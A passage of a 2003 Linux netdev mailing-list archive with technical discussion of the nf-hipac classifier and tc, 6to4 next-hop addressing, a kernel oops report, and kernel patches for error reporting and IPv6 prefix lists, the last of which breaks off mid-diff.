netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: nf@hipac.org Precedence: bulk X-list: netdev This is an OpenPGP/MIME signed message (RFC 2440 and 3156) --------------enig7E93A75E61DF18B37FB81F90 Content-Type: text/plain; 
charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit

Hi Jamal

You wrote:
> This is good. I may have emailed you about this topic before?

Yes, but at that time we did not have any concrete plans to integrate
hipac into tc. We focussed on making nf-hipac as expressive as iptables
first.

> It's a classifier therefore it makes sense ;->

:-)

> nice. What would be interesting is to see your rule update rates vs
> iptables (i expect iptables to suck) - but how do you compare against any
> of the tc classifiers for example?

Regarding the rule update rates we have not done any measurements yet
but nf-hipac should be faster than iptables (even more when we have
implemented the selective cloning stuff). On the other hand we are
probably slower than tc because in addition to the insert operation
into an internal chain there is the actual hipac insert operation.
The insertion in the internal chain is quicker than the tc insert
operation because we use doubly linked lists.

Regarding the matching performance one has to consider a few things.
The currently existing tc classifiers are an abstraction for rules
(iptables "slang") whilst hipac is an abstraction for a set of rules
(including the chain semantics known from iptables), i.e. a table in
the iptables world. Of course it is possible to have some sort of
extended classifying in tc too, i.e. you can add several fw or u32
filters with the same prio which allows the filters to be hashed.
One disadvantage of this concept is that the hashed filters must be
compact, i.e. there cannot be other classifiers in between.
Another major disadvantage is caused by the hashing scheme.
If you use the hash for 1 dimension you have to make sure that
either all filters in a certain bucket are disjoint or you must have
an implicit ordering of the rules (according to the insertion order
or something). This scheme is not extendable to 2 or more dimensions, i.e.
1 hash for src ip, #(src ip buckets) many dst ip hashes and so on,
because you simply cannot express arbitrary rulesets.
Another general problem is of course that the user has to manually
set up the hash which is rather inconvenient.

Now, what are the implications on the matching performance:
tc vs. nf-hipac? As long as the extended hashing stuff is not used
nf-hipac is clearly superior to tc. When hashing is used it _really_
depends. If there is only one classifier (with hashing) per interface
and the number of rules per bucket is very small the performance should
be comparable. As soon as you add other classifiers nf-hipac will
outperform tc again.

>>The tc framework is very flexible with respect to where filters can be
>>attached. Unfortunately this cannot be mapped into one HIPAC data
>>structure. Our current design allows to attach filters anywhere but
>>only the filters attached to the top level qdisc would benefit from the
>>HIPAC algorithm. Would this be a noticeable restriction?
>
> I dont think so, but can you describe this restriction?

Well, we thought a little more about the design and came to the
conclusion that it is not necessary to have a HIPAC qdisc at root
but it suffices to ensure that the HIPAC classifier occurs only once
per interface. As you can guess from the last sentence we dropped the
HIPAC qdisc design and changed to the following scheme:
- there is no special HIPAC qdisc at all :-)
- the HIPAC classifier is no longer a simple rule but represents
  the whole table
- the HIPAC classifier can occur in any qdisc but at most once
  per interface

So, basically HIPAC is just a normal classifier like any other
with two exceptions:
a) it can occur only once per interface
b) the rules within the classifier can contain other classifiers,
   e.g. u32, fw, tc_index, as matches

There is just one problem with the current tc framework.
Once a new filter is inserted into the chain it is not removed even
if the change function of the classifier returns < 0
(2.6.0-test1: net/sched/cls_api.c: line 280f).
This should be changed anyway, shouldn't it?

>>- new HIPAC classifier which supports all native nf-hipac matches
>> (src/dst ip, proto, src/dst port, ttl, state, in_iface, icmp type,
>> tcpflags, fragments) and additionally fwmark
>
> I would think for cleanliness fwmark or any metadata related
> classification would be separate from one that is based on packet bits.

Since our classifier represents a table of rules and the rules
are based on different matches, like src/dst ip and also
fwmark (native) or u32 (subclassifier as match), this is definitely
a clean design.

>>- the HIPAC classifier can only be attached to the HIPAC qdisc and vice
>> versa the HIPAC qdisc only accepts HIPAC classifiers
>
>
> We do have an issue with being able to do extended classification
> but building a qdisc for it is a no no. Building a qdisc that will force
> other classifier to structure themselves after it is even a bigger sin.
> Look at the action code i have (i can send you an updated patch); a
> better idea is to make extended classifiers an action based on another
> filter match. At least this is what i have been toying with and i dont
> think it is clean enough. what we need is to extend the filtering
> framework itself to have extended classifiers.

The new design should be much cleaner. Originally we also thought
about making HIPAC a classifier only but we expected some problems
related to this approach.
Finally we discovered that this is not the case :) Regards, +-----------------------+----------------------+ | Michael Bellion | Thomas Heinz | | | | +-----------------------+----------------------+ | High Performance Packet Classification | | nf-hipac: http://www.hipac.org/ | +----------------------------------------------+ --------------enig7E93A75E61DF18B37FB81F90 Content-Type: application/pgp-signature -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.1 (GNU/Linux) Comment: Using GnuPG with Debian - http://enigmail.mozdev.org iD8DBQE/FqDxtXh2AYIMjggRAnVNAKCYNTOiCa/Op3UREZhsVmSzfccRTgCgqaIO uzyXIMuow/L2f4qAejQgTaQ= =mgBg -----END PGP SIGNATURE----- --------------enig7E93A75E61DF18B37FB81F90-- From pekkas@netcore.fi Thu Jul 17 06:55:31 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 17 Jul 2003 06:55:43 -0700 (PDT) Received: from netcore.fi (netcore.fi [193.94.160.1]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6HDtTFl006712 for ; Thu, 17 Jul 2003 06:55:31 -0700 Received: from localhost (pekkas@localhost) by netcore.fi (8.11.6/8.11.6) with ESMTP id h6HDtE006364; Thu, 17 Jul 2003 16:55:14 +0300 Date: Thu, 17 Jul 2003 16:55:14 +0300 (EEST) From: Pekka Savola To: Mika Liljeberg cc: kuznet@ms2.inr.ac.ru, , , Subject: Re: Fw: [PATCH] IPv6: Allow 6to4 routes with SIT In-Reply-To: <1058442897.5780.69.camel@hades> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-archive-position: 4136 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: pekkas@netcore.fi Precedence: bulk X-list: netdev On 17 Jul 2003, Mika Liljeberg wrote: > On Thu, 2003-07-17 at 14:16, Mika Liljeberg wrote: > > On Thu, 2003-07-17 at 10:04, Pekka Savola wrote: > > > > ip route add 3ffe::.... via 193.233.7.65 > > > > > > That would be simpler but, we actually require: > > > > > > ip route add 3ffe::... via ::193.233.7.65 > > > > > > and thus require a route for ::/96. 
That's confusing: ::/96 has a very > > > specific purpose in RFCs, and we should not be overloading the > > > functionality, it's just plain confusing. > > > > I agree with Pekka. Alexey, you yourself admitted that this hack was put > > in, because you needed a way to represent an IPv4 address in IPv6 > > format. The IPv4-mapped format (::ffff:a.b.c.d) exists exactly for this > > purpose. User space tools can accept it as a.b.c.d and convert to > > IPv4-Mapped for the IPv6 API. There is no need to invent non-standard > > practises. > > Ok, I have to correct myself a bit here. Looking at the 6to4 RFC it > actually does recommend the fe80::v4addr format, already mentioned, in > case a link-local address is needed. Note that the spec refers to the generation of your *own* fe80::x address, in the case that e.g. the implementations like to have link-local addresses on interfaces. One doesn't say that when you're contacting 6to4 relays, you should use a link-local address formed like above to communicagte the IP address. > So we would have: > > ip route add 3ffe:... via fe80::bada:bee4 dev sitX > > Clean, although not as convenient for the user. I disagree a bit on cleanliness. The problem with the above is that when you see the next-hop "fe80::bada:bee4", you can't have any idea whether it really means "tunnel to (dec)bada:bee4" or "a router known as fe80::bada:bee4". It depends on the interface. The context of 6to4 is lost. For that reason, IMO 2002:v4:addr is the clearest, and "via v4addr" seems like the next best one (IMHO). -- Pekka Savola "You each name yourselves king, yet the Netcore Oy kingdom bleeds." Systems. Networks. Security. -- George R.R. 
Martin: A Clash of Kings From mika.liljeberg@welho.com Thu Jul 17 07:33:58 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 17 Jul 2003 07:34:09 -0700 (PDT) Received: from hades.pp.htv.fi (cs180094.pp.htv.fi [213.243.180.94]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6HEXtFl007935 for ; Thu, 17 Jul 2003 07:33:57 -0700 Received: from hades.pp.htv.fi (liljeber@localhost [127.0.0.1]) by hades.pp.htv.fi (8.12.9/8.12.9/Debian-5) with ESMTP id h6HEZbLH025327; Thu, 17 Jul 2003 17:35:37 +0300 Received: (from liljeber@localhost) by hades.pp.htv.fi (8.12.9/8.12.9/Debian-5) id h6HEZaFC025326; Thu, 17 Jul 2003 17:35:36 +0300 X-Authentication-Warning: hades.pp.htv.fi: liljeber set sender to mika.liljeberg@welho.com using -f Subject: Re: Fw: [PATCH] IPv6: Allow 6to4 routes with SIT From: Mika Liljeberg To: Pekka Savola Cc: kuznet@ms2.inr.ac.ru, davem@redhat.com, jmorris@redhat.com, netdev@oss.sgi.com In-Reply-To: References: Content-Type: text/plain Content-Transfer-Encoding: 7bit Message-Id: <1058452536.5781.87.camel@hades> Mime-Version: 1.0 X-Mailer: Ximian Evolution 1.4.3 Date: 17 Jul 2003 17:35:36 +0300 X-archive-position: 4137 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: mika.liljeberg@welho.com Precedence: bulk X-list: netdev Pekka, Looks like I've talked myself around to Alexey's point of view. :-) On Thu, 2003-07-17 at 16:55, Pekka Savola wrote: > Note that the spec refers to the generation of your *own* fe80::x address, > in the case that e.g. the implementations like to have link-local > addresses on interfaces. One doesn't say that when you're contacting 6to4 > relays, you should use a link-local address formed like above to > communicagte the IP address. Yes, but section 3.7 of rfc2893 talks about the use of that link-layer address with routing protocols. I take this to include "as next hop address". > I disagree a bit on cleanliness. 
The problem with the above is that when > you see the next-hop "fe80::bada:bee4", you can't have any idea whether it > really means "tunnel to (dec)bada:bee4" or "a router known as > fe80::bada:bee4". It depends on the interface. The context of 6to4 is > lost. I would say that is a feature. The next hop address *always* identifies the next hop router, and it's a link-local unicast as it is supposed to be. In the case of 6to4, the next hop router just happens to be a 6to4 relay located on the virtual link provided by the SIT interface. The tunneling is purely a property of the SIT interface, the routing code doesn't have to care. Theoretically, you could even create solicited node multicast addresses the same way and run ND over the tunnel (not that it's needed). MikaL From andersg@0x63.nu Thu Jul 17 08:14:04 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 17 Jul 2003 08:14:17 -0700 (PDT) Received: from gagarin.0x63.nu (mail@h55p111.delphi.afb.lu.se [130.235.187.184]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6HFE2Fl009267 for ; Thu, 17 Jul 2003 08:14:04 -0700 Received: from andersg by gagarin.0x63.nu with local (Exim 3.36 #1 (Debian)) id 19dASA-0002p0-00; Thu, 17 Jul 2003 17:13:54 +0200 Date: Thu, 17 Jul 2003 17:13:54 +0200 To: netdev@oss.sgi.com Cc: yoshfuji@linux-ipv6.org Subject: OOPS in ip6_output2 Message-ID: <20030717151354.GA10640@h55p111.delphi.afb.lu.se> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.5.4i From: Anders Gustafsson X-Scanner: exiscan *19dASA-0002p0-00*vKm/Ri6jTfU*0x63.nu X-archive-position: 4138 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: andersg@0x63.nu Precedence: bulk X-list: netdev I don't follow netdev so maybe this is old stuff, but I got this oops when trying to ssh to a ipv6-host. 
The defaultroute seems garbled too: (or maybe that is what causes it) andersg@laika:~$ ip -6 ro l default default via 90a6:1840:c79a:1840:: dev eth1 proto kernel metric 1024 expires 17643sec mtu 1500 advmss 1440 but I got the correct prefix from radvd. Unable to handle kernel NULL pointer dereference at virtual address 00000000 printing eip: 00000000 *pde = 00000000 Oops: 0000 [#1] CPU: 0 EIP: 0060:[<00000000>] Not tainted EFLAGS: 00010282 EIP is at 0x0 eax: cc5fc004 ebx: ca581004 ecx: cc9d4004 edx: ca55e084 esi: ca581004 edi: 00000000 ebp: 00000000 esp: ca315ca8 ds: 007b es: 007b ss: 0068 Process ssh (pid: 1652, threadinfo=ca314000 task=ca3e1000) Stack: c02ad9a2 ca581004 00000000 00000000 ca315d94 ca4d6004 00000000 00000000 000005dc ca581004 00000000 00000028 c02adec1 ca581004 ca315d4c 00000010 00000000 00000000 00000000 00000096 00000096 c119c8c8 00000000 cc0bf004 Call Trace: [] ip6_output2+0x172/0x250 [] ip6_xmit+0x201/0x3a0 [] tcp_v6_xmit+0x118/0x250 [] tcp_transmit_skb+0x3e5/0x600 [] tcp_connect+0x3bc/0x490 [] tcp_v6_connect+0x3bb/0x7c0 [] inet_stream_connect+0x114/0x260 [] sys_connect+0x85/0xc0 [] sock_map_fd+0xfa/0x130 [] sys_socket+0x3d/0x60 [] sys_socketcall+0xd1/0x2a0 [] syscall_call+0x7/0xb -- Anders Gustafsson - andersg@0x63.nu - http://0x63.nu/ From jkenisto@us.ibm.com Thu Jul 17 12:16:33 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 17 Jul 2003 12:16:46 -0700 (PDT) Received: from e3.ny.us.ibm.com (e3.ny.us.ibm.com [32.97.182.103]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6HJGPFl019582 for ; Thu, 17 Jul 2003 12:16:33 -0700 Received: from northrelay04.pok.ibm.com (northrelay04.pok.ibm.com [9.56.224.206]) by e3.ny.us.ibm.com (8.12.9/8.12.2) with ESMTP id h6HJFFpW176692; Thu, 17 Jul 2003 15:15:15 -0400 Received: from us.ibm.com (d01av02.pok.ibm.com [9.56.224.216]) by northrelay04.pok.ibm.com (8.12.9/NCO/VER6.5) with ESMTP id h6HJFAhA126834; Thu, 17 Jul 2003 15:15:11 -0400 Message-ID: <3F16F54C.949A9299@us.ibm.com> Date: Thu, 17 Jul 2003 
12:13:16 -0700
From: Jim Keniston
X-Mailer: Mozilla 4.75 [en] (WinNT; U)
X-Accept-Language: en
MIME-Version: 1.0
To: Andrew Morton
CC: jmorris@intercode.com.au, davem@redhat.com, linux-kernel@vger.kernel.org, netdev@oss.sgi.com, jgarzik@pobox.com, alan@lxorguk.ukuu.org.uk, rddunlap@osdl.org, kuznet@ms2.inr.ac.ru, jkenisto@us.ibm.com
Subject: Re: [PATCH] [1/2] kernel error reporting (revised)
References: <3F143D0A.A052F0B6@us.ibm.com> <20030715125121.315920a2.akpm@osdl.org>
Content-Type: multipart/mixed; boundary="------------1C2AB73BB6D657AFF025223B"
X-archive-position: 4139
X-ecartis-version: Ecartis v1.0.0
Sender: netdev-bounce@oss.sgi.com
Errors-to: netdev-bounce@oss.sgi.com
X-original-sender: jkenisto@us.ibm.com
Precedence: bulk
X-list: netdev

This is a multi-part message in MIME format.
--------------1C2AB73BB6D657AFF025223B
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit

Andrew Morton wrote:
>
> Jim Keniston wrote:
> >
> > +int kernel_error_event_iov(const struct iovec *iov, unsigned int nseg,
> > +	u32 groups)
> > +{
> > ...
> > +
> > +	return netlink_broadcast(kerror_nl, skb, 0, ~0, GFP_ATOMIC);
>
> This appears to be deadlocky when called from interrupt handlers.
>
> netlink_broadcast() does read_lock(&nl_table_lock). But nl_table_lock is
> not an irq-safe lock.
>
> Possibly netlink_broadcast() can be made callable from hardirq context, but
> it looks to be non trivial. The various error and delivery handlers need
> to be reviewed,

Yes indeed. I believe this issue is resolved by detecting that we're in
an interrupt handler and delaying the call to netlink_broadcast() via a
tasklet. See the enclosed patch to the previously posted rev. I'll update
the full patch at
http://prdownloads.sourceforge.net/evlog/kerror-2.5.75.patch?download

An issue remains: what, if anything, to tell the caller if the delayed
netlink_broadcast() fails. See below for further thoughts.

> the kfree_skb() calls should be thought about, etc.
I've thought about them. :-) Given the aforementioned solution, I don't
think kfree_skb() is an issue, because it's called as needed by
netlink_broadcast(). If I'm missing something here, feel free to clarify.

Thanks.
Jim

WHAT IF THE DELAYED netlink_broadcast() CALL FAILS?

1. Can we detect from IRQ context that nobody is listening, and thereby
return -ESRCH to the caller?

No, to do that would require perusing the nl_table[NETLINK_KERROR] list.
We can't do that for the same reason we can't call netlink_broadcast().
So kernel_error_event_iov() now returns -EINPROGRESS if it had to delay
the netlink_broadcast() call.

2. Could the tasklet report netlink_broadcast() failures back to the
higher-level code?

Yes, we could implement a per-group callback to handle that. Current
thinking is that it's overkill. But it would resolve the next issue...

3. Given the above, what should the evlog.c caller do when
kernel_error_event_iov() returns -EINPROGRESS?
a. Nothing. Figure the packet will probably get logged.
b. Just to be safe, report it via printk, the same way we report dropped
packets.

We currently do (a). (b) would mean that every event logged from IRQ
context would be cc-ed to printk.
-----
--------------1C2AB73BB6D657AFF025223B
Content-Type: text/plain; charset=us-ascii; name="kerror.patch.txt"
Content-Transfer-Encoding: 7bit
Content-Disposition: inline; filename="kerror.patch.txt"

--- kerror.c.old	Thu Jul 17 10:53:19 2003
+++ kerror.c	Thu Jul 17 10:54:55 2003
@@ -3,10 +3,12 @@
  * Copyright (C) 2003 David S. Miller (davem@redhat.com)
  * June 2003 - Jim Keniston and Dan Stekloff (kenistoj and dsteklof@us.ibm.com)
  *	Fixed a couple of bugs and added iovec interface.
+ * July 2003 - Jim Keniston - Added handling of packets logged from IRQ context.
  */
 #include
 #include
+#include
 #include
 #include
 #include
@@ -17,6 +19,33 @@
 static struct sock *kerror_nl;
+/* Packets logged from IRQ context are queued for broadcast by a tasklet. */
+static struct sk_buff_head delayed_pkts;
+static void broadcast_delayed_pkts(unsigned long);
+static DECLARE_TASKLET(delayed_pkts_tasklet, broadcast_delayed_pkts, 0);
+
+/**
+ * delayed_broadcast() - Schedule a tasklet to broadcast a packet.
+ * We want to broadcast the indicated packet, but can't because we're
+ * in a hardware interrupt and so can't call netlink_broadcast().
+ * Schedule a tasklet to do the job.
+ *
+ * @skb: the socket buffer to broadcast
+ */
+static void delayed_broadcast(struct sk_buff *skb)
+{
+	skb_queue_tail(&delayed_pkts, skb);
+	tasklet_schedule(&delayed_pkts_tasklet);
+}
+
+static void broadcast_delayed_pkts(unsigned long ignored)
+{
+	struct sk_buff *skb;
+	while ((skb = skb_dequeue(&delayed_pkts)) != NULL) {
+		(void) netlink_broadcast(kerror_nl, skb, 0, ~0, GFP_ATOMIC);
+	}
+}
+
 /**
  * kernel_error_event_iov() - Broadcast packet to NETLINK_KERROR sockets.
  * @iov: the packet's data
@@ -54,6 +83,11 @@
 	NETLINK_CB(skb).dst_groups = groups;
+	if (in_irq()) {
+		delayed_broadcast(skb);
+		return -EINPROGRESS;
+	}
+
 	return netlink_broadcast(kerror_nl, skb, 0, ~0, GFP_ATOMIC);
 nlmsg_failure:
@@ -85,6 +119,7 @@
 	if (kerror_nl == NULL)
 		panic("kerror_init: cannot initialize kerror_nl\n");
+	skb_queue_head_init(&delayed_pkts);
 	return 0;
 }
--------------1C2AB73BB6D657AFF025223B--

From krkumar@us.ibm.com Thu Jul 17 14:15:23 2003
Received: with ECARTIS (v1.0.0; list netdev); Thu, 17 Jul 2003 14:15:36 -0700 (PDT)
Received: from e1.ny.us.ibm.com (e1.ny.us.ibm.com [32.97.182.101]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6HLFFFl029355 for ; Thu, 17 Jul 2003 14:15:22 -0700
Received: from northrelay04.pok.ibm.com (northrelay04.pok.ibm.com [9.56.224.206]) by e1.ny.us.ibm.com (8.12.9/8.12.2) with ESMTP id h6HLEMKb212054; Thu, 17 Jul 2003 17:14:22 -0400
Received: from DYN318430.beaverton.ibm.com (d01av02.pok.ibm.com [9.56.224.216]) by northrelay04.pok.ibm.com (8.12.9/NCO/VER6.5) with ESMTP id h6HLEChB044924; Thu, 17 Jul 2003 17:14:13 -0400
Date: Thu, 17
Jul 2003 14:12:37 -0700 (PDT)
From: Krishna Kumar
X-X-Sender: krkumar@DYN318430.beaverton.ibm.com
To: kuznet@ms2.inr.ac.ru
cc: yoshfuji@linux-ipv6.org, , ,
Subject: [PATCH 1/2] Prefix List and O/M flags against 2.5.73
In-Reply-To: <200307170038.EAA12945@dub.inr.ac.ru>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
X-archive-position: 4140
X-ecartis-version: Ecartis v1.0.0
Sender: netdev-bounce@oss.sgi.com
Errors-to: netdev-bounce@oss.sgi.com
X-original-sender: krkumar@us.ibm.com
Precedence: bulk
X-list: netdev

> > This is sort of what I had originally, so I should be able to change
> > it to do this quite easily. I didn't like the earlier suggestion of
> > using existing RTM_xxxLINK with RTM_xxxIFACE (since it was dev generic),
> > but having a new interface RTM_xxxIFACE sounds good to me.
> Actually, the original plan was to use ifli_family to query something
> or to direct a request to a specific interface on some netdevice.
> I wanted to reserve IFLI_PROTINFO attribute to encapsulate information
> private for specific family. It was not realized mostly because of absense
> of such information.
>
> Maybe, you will want to resurrect this.

I am sorry, but I have no idea what you are talking about :-)

I am including a patch with what was agreed upon yesterday by everyone. I
have tested the prefix list retrieval using ip (with slight changes to the
ip command, I can now dump prefixes with "ip -f inet6 route prefix", in a
format identical to that of the "ip -f inet6 route" command).

For the O/M flags, I am using a new RTM_GETIFFLAGS, but if needed this can
be changed to use RTM_GETLNKINFO (or something) with RTA_IFFLAGS, if
multiple pieces of data need to be returned. If that is needed, I can
submit a (5 line?) patch to be applied after this is accepted.
Thanks, - KK diff -ruN linux-2.5.73.org/include/linux/ipv6_route.h test/linux-2.5.73/include/linux/ipv6_route.h --- linux-2.5.73.org/include/linux/ipv6_route.h 2003-06-22 11:32:36.000000000 -0700 +++ test/linux-2.5.73/include/linux/ipv6_route.h 2003-07-17 11:38:23.000000000 -0700 @@ -16,6 +16,7 @@ #define RTF_DEFAULT 0x00010000 /* default - learned via ND */ #define RTF_ALLONLINK 0x00020000 /* fallback, no routers on link */ #define RTF_ADDRCONF 0x00040000 /* addrconf route - RA */ +#define RTF_PREFIX_RT 0x00080000 /* A prefix only route - RA */ #define RTF_NONEXTHOP 0x00200000 /* route with no nexthop */ #define RTF_EXPIRES 0x00400000 diff -ruN linux-2.5.73.org/include/linux/rtnetlink.h test/linux-2.5.73/include/linux/rtnetlink.h --- linux-2.5.73.org/include/linux/rtnetlink.h 2003-06-22 11:33:07.000000000 -0700 +++ test/linux-2.5.73/include/linux/rtnetlink.h 2003-07-16 17:23:06.000000000 -0700 @@ -47,7 +47,9 @@ #define RTM_DELTFILTER (RTM_BASE+29) #define RTM_GETTFILTER (RTM_BASE+30) -#define RTM_MAX (RTM_BASE+31) +#define RTM_GETIFFLAGS (RTM_BASE+34) + +#define RTM_MAX (RTM_GETIFFLAGS+1) /* Generic structure for encapsulation of optional route information. 
@@ -61,6 +63,13 @@ unsigned short rta_type; }; +/* Structure to return per interface device flags */ +struct ifp_if6info +{ + int ifindex; + int flags; +}; + /* Macros to handle rtattributes */ #define RTA_ALIGNTO 4 @@ -168,6 +177,7 @@ #define RTM_F_NOTIFY 0x100 /* Notify user of route change */ #define RTM_F_CLONED 0x200 /* This route is cloned */ #define RTM_F_EQUALIZE 0x400 /* Multipath equalizer: NI */ +#define RTM_F_PREFIX 0x800 /* Prefix addresses */ /* Reserved table identifiers */ diff -ruN linux-2.5.73.org/include/net/if_inet6.h test/linux-2.5.73/include/net/if_inet6.h --- linux-2.5.73.org/include/net/if_inet6.h 2003-06-22 11:33:32.000000000 -0700 +++ test/linux-2.5.73/include/net/if_inet6.h 2003-07-16 17:23:24.000000000 -0700 @@ -17,6 +17,8 @@ #include +#define IF_RA_OTHERCONF 0x80 +#define IF_RA_MANAGED 0x40 #define IF_RA_RCVD 0x20 #define IF_RS_SENT 0x10 diff -ruN linux-2.5.73.org/net/ipv6/addrconf.c test/linux-2.5.73/net/ipv6/addrconf.c --- linux-2.5.73.org/net/ipv6/addrconf.c 2003-06-22 11:33:17.000000000 -0700 +++ test/linux-2.5.73/net/ipv6/addrconf.c 2003-07-17 11:40:48.000000000 -0700 @@ -129,7 +129,7 @@ static int addrconf_ifdown(struct net_device *dev, int how); -static void addrconf_dad_start(struct inet6_ifaddr *ifp); +static void addrconf_dad_start(struct inet6_ifaddr *ifp, int flags); static void addrconf_dad_timer(unsigned long data); static void addrconf_dad_completed(struct inet6_ifaddr *ifp); static void addrconf_rs_timer(unsigned long data); @@ -715,7 +715,7 @@ ift->prefered_lft = tmp_prefered_lft; ift->tstamp = ifp->tstamp; spin_unlock_bh(&ift->lock); - addrconf_dad_start(ift); + addrconf_dad_start(ift, 0); in6_ifa_put(ift); in6_dev_put(idev); out: @@ -1211,7 +1211,7 @@ rtmsg.rtmsg_dst_len = 8; rtmsg.rtmsg_metric = IP6_RT_PRIO_ADDRCONF; rtmsg.rtmsg_ifindex = dev->ifindex; - rtmsg.rtmsg_flags = RTF_UP|RTF_ADDRCONF; + rtmsg.rtmsg_flags = RTF_UP; rtmsg.rtmsg_type = RTMSG_NEWROUTE; ip6_route_add(&rtmsg, NULL, NULL); } @@ -1238,7 +1238,7 @@ 
struct in6_addr addr; ipv6_addr_set(&addr, htonl(0xFE800000), 0, 0, 0); - addrconf_prefix_route(&addr, 64, dev, 0, RTF_ADDRCONF); + addrconf_prefix_route(&addr, 64, dev, 0, 0); } static struct inet6_dev *addrconf_add_dev(struct net_device *dev) @@ -1330,7 +1330,8 @@ } } else if (pinfo->onlink && valid_lft) { addrconf_prefix_route(&pinfo->prefix, pinfo->prefix_len, - dev, rt_expires, RTF_ADDRCONF|RTF_EXPIRES); + dev, rt_expires, + RTF_ADDRCONF|RTF_EXPIRES|RTF_PREFIX_RT); } if (rt) dst_release(&rt->u.dst); @@ -1378,7 +1379,7 @@ } create = 1; - addrconf_dad_start(ifp); + addrconf_dad_start(ifp, RTF_ADDRCONF|RTF_PREFIX_RT); } if (ifp && valid_lft == 0) { @@ -1529,7 +1530,7 @@ ifp = ipv6_add_addr(idev, pfx, plen, scope, IFA_F_PERMANENT); if (!IS_ERR(ifp)) { - addrconf_dad_start(ifp); + addrconf_dad_start(ifp, 0); in6_ifa_put(ifp); return 0; } @@ -1704,7 +1705,7 @@ ifp = ipv6_add_addr(idev, addr, 64, IFA_LINK, IFA_F_PERMANENT); if (!IS_ERR(ifp)) { - addrconf_dad_start(ifp); + addrconf_dad_start(ifp, 0); in6_ifa_put(ifp); } } @@ -1943,8 +1944,7 @@ memset(&rtmsg, 0, sizeof(struct in6_rtmsg)); rtmsg.rtmsg_type = RTMSG_NEWROUTE; rtmsg.rtmsg_metric = IP6_RT_PRIO_ADDRCONF; - rtmsg.rtmsg_flags = (RTF_ALLONLINK | RTF_ADDRCONF | - RTF_DEFAULT | RTF_UP); + rtmsg.rtmsg_flags = (RTF_ALLONLINK | RTF_DEFAULT | RTF_UP); rtmsg.rtmsg_ifindex = ifp->idev->dev->ifindex; @@ -1958,7 +1958,7 @@ /* * Duplicate Address Detection */ -static void addrconf_dad_start(struct inet6_ifaddr *ifp) +static void addrconf_dad_start(struct inet6_ifaddr *ifp, int flags) { struct net_device *dev; unsigned long rand_num; @@ -1968,7 +1968,7 @@ addrconf_join_solict(dev, &ifp->addr); if (ifp->prefix_len != 128 && (ifp->flags&IFA_F_PERMANENT)) - addrconf_prefix_route(&ifp->addr, ifp->prefix_len, dev, 0, RTF_ADDRCONF); + addrconf_prefix_route(&ifp->addr, ifp->prefix_len, dev, 0, flags); net_srandom(ifp->addr.s6_addr32[3]); rand_num = net_random() % (ifp->idev->cnf.rtr_solicit_delay ? 
: 1); @@ -2451,6 +2451,42 @@ netlink_broadcast(rtnl, skb, 0, RTMGRP_IPV6_IFADDR, GFP_ATOMIC); } +int inet6_dump_linkflags(struct sk_buff *skb, struct netlink_callback *cb) +{ + int ifindex, flags; + struct net_device *dev; + struct inet6_dev *idev; + struct nlmsghdr *nlh; + struct ifp_if6info *ifp = NLMSG_DATA(cb->nlh); + unsigned char *org_tail = skb->tail; + + ifindex = ifp->ifindex; + if ((dev = dev_get_by_index(ifindex)) == NULL) + goto out; + if ((idev = in6_dev_get(dev)) != NULL) { + flags = idev->if_flags; + in6_dev_put(idev); + } else + flags = 0; + dev_put(dev); + + nlh = NLMSG_PUT(skb, NETLINK_CB(cb->skb).pid, cb->nlh->nlmsg_seq, + RTM_GETIFFLAGS, sizeof(*ifp)); + ifp = NLMSG_DATA(nlh); + ifp->flags = flags; + ifp->ifindex = ifindex; /* duplicate info for user to verify */ + + nlh->nlmsg_len = skb->tail - org_tail; + return skb->len; + +nlmsg_failure: + printk(KERN_INFO "inet6_dump_linkflags:skb size not enough\n"); + skb_trim(skb, org_tail - skb->data); + +out: + return -1; +} + static struct rtnetlink_link inet6_rtnetlink_table[RTM_MAX - RTM_BASE + 1] = { [RTM_NEWADDR - RTM_BASE] = { .doit = inet6_rtm_newaddr, }, [RTM_DELADDR - RTM_BASE] = { .doit = inet6_rtm_deladdr, }, @@ -2459,6 +2495,7 @@ [RTM_DELROUTE - RTM_BASE] = { .doit = inet6_rtm_delroute, }, [RTM_GETROUTE - RTM_BASE] = { .doit = inet6_rtm_getroute, .dumpit = inet6_dump_fib, }, + [RTM_GETIFFLAGS - RTM_BASE] = {.dumpit = inet6_dump_linkflags, }, }; static void ipv6_ifa_notify(int event, struct inet6_ifaddr *ifp) diff -ruN linux-2.5.73.org/net/ipv6/ndisc.c test/linux-2.5.73/net/ipv6/ndisc.c --- linux-2.5.73.org/net/ipv6/ndisc.c 2003-06-22 11:32:56.000000000 -0700 +++ test/linux-2.5.73/net/ipv6/ndisc.c 2003-07-14 15:06:14.000000000 -0700 @@ -1036,6 +1036,16 @@ */ in6_dev->if_flags |= IF_RA_RCVD; } + /* + * Remember the managed/otherconf flags from most recently + * receieved RA message (RFC 2462) -- yoshfuji + */ + in6_dev->if_flags = (in6_dev->if_flags & ~(IF_RA_MANAGED| + IF_RA_OTHERCONF)) | + 
